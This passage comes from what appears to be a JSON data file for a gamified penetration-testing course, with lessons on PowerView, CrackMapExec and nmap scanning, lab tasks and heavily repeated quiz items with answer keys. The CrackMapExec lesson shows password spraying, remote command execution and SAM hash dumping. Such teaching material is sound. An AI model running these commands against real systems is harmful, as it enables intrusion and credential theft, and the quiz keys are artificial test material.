hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-powerview","cat":"Post-Exploitation","title":"PowerView AD Enumeration","diff":2,"xp":150,"intro":"PowerShell tool for Active Directory reconnaissance.","sections":[{"type":"text","content":"PowerShell tool for Active Directory reconnaissance."},{"type":"code","lang":"bash","content":"Import-Module PowerView.ps1\nGet-DomainUser | Select samaccountname,description\nGet-DomainGroup -AdminCount\nGet-DomainComputer\nGet-DomainTrust\nFind-LocalAdminAccess"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"PowerView is designed for...","opts":["Network scanning","Active Directory enumeration and exploitation","Web testing","Forensics"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-crackmapexec","cat":"Post-Exploitation","title":"CrackMapExec Usage","diff":2,"xp":150,"intro":"Swiss army knife for network pentesting.","sections":[{"type":"text","content":"Swiss army knife for network pentesting."},{"type":"code","lang":"bash","content":"# Enumerate\ncrackmapexec smb 10.0.0.0/24\n# Spray passwords\ncrackmapexec smb DC -u users.txt -p pass.txt --continue-on-success\n# Execute commands\ncrackmapexec smb target -u admin -p pass -x 'whoami'\n# Dump hashes\ncrackmapexec smb target -u admin -p pass --sam"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"CME operates primarily over...","opts":["HTTP","SMB (port 445)","SSH","RDP"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"g-nmap-udp","cat":"Reconnaissance","title":"Nmap UDP Scanning","diff":2,"xp":150,"intro":"UDP scan finds DNS, SNMP, DHCP, NTP services.","sections":[{"type":"text","content":"UDP scan finds DNS, SNMP, DHCP, NTP services."},{"type":"code","lang":"bash","content":"nmap -sU -p 53,67,123,161,500 target --open"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"UDP scanning is slower because...","opts":["UDP is encrypted","UDP has no handshake (timeout-based detection)","UDP is blocked","Nmap doesn't support it"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-nmap-version-all","cat":"Reconnaissance","title":"Nmap Full Version Detection","diff":2,"xp":150,"intro":"Comprehensive service and version identification.","sections":[{"type":"text","content":"Comprehensive service and version identification."},{"type":"code","lang":"bash","content":"nmap -sV --version-all -p- target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"--version-all increases...","opts":["Speed","Detection thoroughness (more probes)","Port range","Stealth"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-nmap-idle-scan","cat":"Reconnaissance","title":"Nmap Idle Scan (-sI)","diff":4,"xp":250,"intro":"Scan using a zombie host \u2014 completely anonymous.","sections":[{"type":"text","content":"Scan using a zombie host \u2014 completely anonymous."},{"type":"code","lang":"bash","content":"nmap -sI zombie_host target -Pn"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Idle scan uses a zombie to...","opts":["Speed up scanning","Hide the scanner's real IP address","Bypass encryption","Access internal networks"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-nmap-os-version","cat":"Reconnaissance","title":"Nmap OS and Version Combo","diff":2,"xp":150,"intro":"Detect OS and services simultaneously.","sections":[{"type":"text","content":"Detect OS and services simultaneously."},{"type":"code","lang":"bash","content":"nmap -O -sV target\nnmap -A target  # OS + version + scripts + traceroute"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"nmap -A combines...","opts":["Only port scan","OS detection, version, scripts, and traceroute","Only OS","Only version"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-nmap-script-custom","cat":"Reconnaissance","title":"Custom NSE Script Usage","diff":3,"xp":200,"intro":"Run specific NSE scripts for targeted testing.","sections":[{"type":"text","content":"Run specific NSE scripts for targeted testing."},{"type":"code","lang":"bash","content":"nmap --script=http-title,http-headers target\nnmap --script=smb-vuln-* target\nnmap --script=ssh-auth-methods target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"NSE scripts extend nmap with...","opts":["Faster scanning","Custom vulnerability checks and enumeration","Better output","UDP support"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-nmap-grep","cat":"Reconnaissance","title":"Nmap Output Parsing","diff":1,"xp":50,"intro":"Parse nmap results for automated workflows.","sections":[{"type":"text","content":"Parse nmap results for automated workflows."},{"type":"code","lang":"bash","content":"nmap -oG scan.grep target\ngrep 'open' scan.grep | awk '{print $2}'\nnmap -oX scan.xml target  # XML for tools"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Greppable output (-oG) is useful for...","opts":["Manual reading","Automated parsing in scripts","Visualization","Database import"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 